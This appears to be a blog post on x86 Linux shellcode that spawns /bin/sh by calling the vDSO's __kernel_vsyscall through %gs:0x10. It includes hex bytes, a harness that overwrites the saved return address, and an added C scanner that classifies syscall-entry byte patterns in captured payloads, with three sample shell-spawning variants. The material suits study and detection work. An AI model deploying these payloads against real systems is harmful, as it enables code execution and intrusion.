Sunday, November 26, 2006

Sysenter shellcode

Not much going on tonight. Whipped up some useless shellcode using the sysenter syscall method as opposed to `int 0x80`, nothing new. The size increase over the `int 0x80` version is pretty small too. I have seen some other shellcodes using the 'push ecx, edx, ebp, sysenter' method; this one is a little bit smaller. Instead of carrying those instructions itself it does `call *%gs:0x10`, which goes through the pointer glibc keeps in the thread control block at `%gs:0x10` (the `sysinfo` field) to `__kernel_vsyscall` in the vDSO, and the vDSO does the `push %ecx; push %edx; push %ebp; mov %esp,%ebp; sysenter` sequence. Strictly speaking, then, the sysenter lives in the vDSO and not in the shellcode: on a CPU or kernel without sysenter support the kernel maps a vDSO whose `__kernel_vsyscall` uses `int 0x80`, and this code would silently use that instead. I wrote it on Ubuntu (Dapper-Drake); the %gs offset may need adjusting on other systems, since it is glibc's TCB layout rather than the kernel that puts the pointer there. Here it is:
static char code[] =
    "\x31\xc0"              /* xor  %eax, %eax                                    */
    "\x50"                  /* push %eax          NUL terminator for the string   */
    "\x68\x2f\x2f\x73\x68"  /* push $0x68732f2f   "//sh"                          */
    "\x68\x2f\x62\x69\x6e"  /* push $0x6e69622f   "/bin"                          */
    "\x89\xe3"              /* mov  %esp, %ebx    ebx = "/bin//sh"                */
    "\x50"                  /* push %eax          argv[1] = NULL                  */
    "\x53"                  /* push %ebx          argv[0] = "/bin//sh"            */
    "\x89\xe1"              /* mov  %esp, %ecx    ecx = argv                      */
    "\x31\xd2"              /* xor  %edx, %edx    edx = envp = NULL               */
    "\xb0\x0b"              /* mov  $0xb, %al     eax = __NR_execve               */
    "\x65\xff\x15\x10";     /* call *%gs:0x10     __kernel_vsyscall. The full
                               encoding is 65 ff 15 10 00 00 00 (a 32-bit
                               displacement); the listing stops after the first
                               displacement byte, so the string's NUL terminator
                               supplies one zero and the two bytes that follow
                               `code` in memory must also be zero for the call
                               to reach %gs:0x10. In a real target those bytes
                               are not under your control.                      */

/* Test harness: overwrite main's saved return address with the address of
   code, so that returning from main jumps into the shellcode. The "+ 2"
   assumes ret sits directly below the saved %ebp and the return address,
   i.e. frame pointer kept and no stack protector; on a current toolchain
   this typically needs -m32 -fno-stack-protector -z execstack to keep that
   layout and make the data segment executable. */
__attribute__((noreturn)) int main()
{
    int *ret;

    ret = (int *)&ret + 2;
    (*ret) = (int)code;
}
I wonder how many shellcodes would fail if you disabled the use of the `int 0x80` interrupt from userspace on a honeypot. I can't think of any valid applications that would break, but I'm sure some would. That would be an interesting experiment.
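Before running that experiment you need a way to tell which entry mechanism a captured blob actually contains. The C program below is an added example, not code from the original post: it scans a buffer for the three byte patterns that matter here (`int $0x80`, `sysenter`, and the `call *%gs:0x10` used above) and counts NUL bytes, since a NUL is what stops a string-copy overflow. The three sample shellcodes are constructed for this example: `sc_vsyscall` is the post's payload with the complete 7-byte encoding of the final instruction, `sc_int80` ends in `int $0x80` instead, and `sc_sysenter` ends in the `push %ecx/%edx/%ebp; mov %esp,%ebp; sysenter` sequence the post mentions. The function and macro names are this example's own.

```c
/*
 * Added example, not code from the original post: report which syscall
 * entry mechanism a 32-bit Linux shellcode uses and count its NUL bytes.
 * All three sample shellcodes below are constructed for this example.
 */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Bit flags, so a blob carrying more than one mechanism reports all of them. */
#define MECH_NONE     0u
#define MECH_INT80    1u   /* cd 80                  int  $0x80      */
#define MECH_SYSENTER 2u   /* 0f 34                  sysenter        */
#define MECH_VSYSCALL 4u   /* 65 ff 15 10 00 00 00   call *%gs:0x10  */

static const unsigned char PAT_INT80[]    = { 0xcd, 0x80 };
static const unsigned char PAT_SYSENTER[] = { 0x0f, 0x34 };
static const unsigned char PAT_VSYSCALL[] = { 0x65, 0xff, 0x15, 0x10, 0x00, 0x00, 0x00 };

/*
 * The execve("/bin//sh", {"/bin//sh", NULL}, NULL) register setup from the
 * post (23 bytes): xor eax; push eax; push "//sh"; push "/bin"; mov esp->ebx;
 * push eax; push ebx; mov esp->ecx; xor edx; mov al,0xb. Only the kernel
 * entry that follows it differs between the samples.
 */
#define EXECVE_SETUP \
    0x31, 0xc0, 0x50, 0x68, 0x2f, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x62, 0x69, \
    0x6e, 0x89, 0xe3, 0x50, 0x53, 0x89, 0xe1, 0x31, 0xd2, 0xb0, 0x0b

/* The post's shellcode with the complete 7-byte call *%gs:0x10 encoding. */
static const unsigned char sc_vsyscall[] = {
    EXECVE_SETUP, 0x65, 0xff, 0x15, 0x10, 0x00, 0x00, 0x00 };
/* Same payload ending in int $0x80. */
static const unsigned char sc_int80[] = { EXECVE_SETUP, 0xcd, 0x80 };
/* Same payload doing the vDSO's work itself:
 * push %ecx; push %edx; push %ebp; mov %esp,%ebp; sysenter. */
static const unsigned char sc_sysenter[] = {
    EXECVE_SETUP, 0x51, 0x52, 0x55, 0x89, 0xe5, 0x0f, 0x34 };

/* Plain substring search; returns 1 if pat occurs anywhere in buf. */
static int has_pattern(const unsigned char *buf, size_t len,
                       const unsigned char *pat, size_t plen)
{
    for (size_t i = 0; i + plen <= len; i++)
        if (memcmp(buf + i, pat, plen) == 0)
            return 1;
    return 0;
}

/* OR of the MECH_* flags whose byte pattern appears in the blob. */
unsigned classify_syscall_mech(const unsigned char *buf, size_t len)
{
    unsigned m = MECH_NONE;
    if (has_pattern(buf, len, PAT_INT80,    sizeof PAT_INT80))    m |= MECH_INT80;
    if (has_pattern(buf, len, PAT_SYSENTER, sizeof PAT_SYSENTER)) m |= MECH_SYSENTER;
    if (has_pattern(buf, len, PAT_VSYSCALL, sizeof PAT_VSYSCALL)) m |= MECH_VSYSCALL;
    return m;
}

/* Number of zero bytes; any non-zero count rules out strcpy-style delivery. */
size_t count_nul_bytes(const unsigned char *buf, size_t len)
{
    size_t n = 0;
    for (size_t i = 0; i < len; i++)
        if (buf[i] == 0)
            n++;
    return n;
}

static void report(const char *name, const unsigned char *sc, size_t len)
{
    unsigned m = classify_syscall_mech(sc, len);
    printf("%-11s %2zu bytes, %zu NUL, mechanisms:%s%s%s%s\n", name, len,
           count_nul_bytes(sc, len),
           (m & MECH_INT80)    ? " int80"    : "",
           (m & MECH_SYSENTER) ? " sysenter" : "",
           (m & MECH_VSYSCALL) ? " vsyscall" : "",
           (m == MECH_NONE)    ? " none"     : "");
}

int main(void)
{
    report("vsyscall", sc_vsyscall, sizeof sc_vsyscall);
    report("int80",    sc_int80,    sizeof sc_int80);
    report("sysenter", sc_sysenter, sizeof sc_sysenter);
    /* The post's listing as printed: 27 bytes, i.e. the final call
       truncated after its first displacement byte. */
    report("as-listed", sc_vsyscall, sizeof sc_vsyscall - 3);
    return 0;
}
```

Two things this shows: the complete `call *%gs:0x10` payload is 30 bytes with three NULs, against 25 NUL-free bytes for the `int 0x80` version, and the 27-byte blob as printed in the post contains no complete kernel-entry instruction at all. The scan is deliberately naive: it ignores instruction boundaries, so a `cd 80` inside an immediate is a false positive, it misses encoded or self-modifying payloads, and it misses other spellings of the same idea such as `mov %gs:0x10,%eax; call *%eax`. It also cannot tell you whether a `vsyscall` hit will end up executing `sysenter` or `int 0x80`, because that is decided by the vDSO the kernel mapped into the process, not by the shellcode.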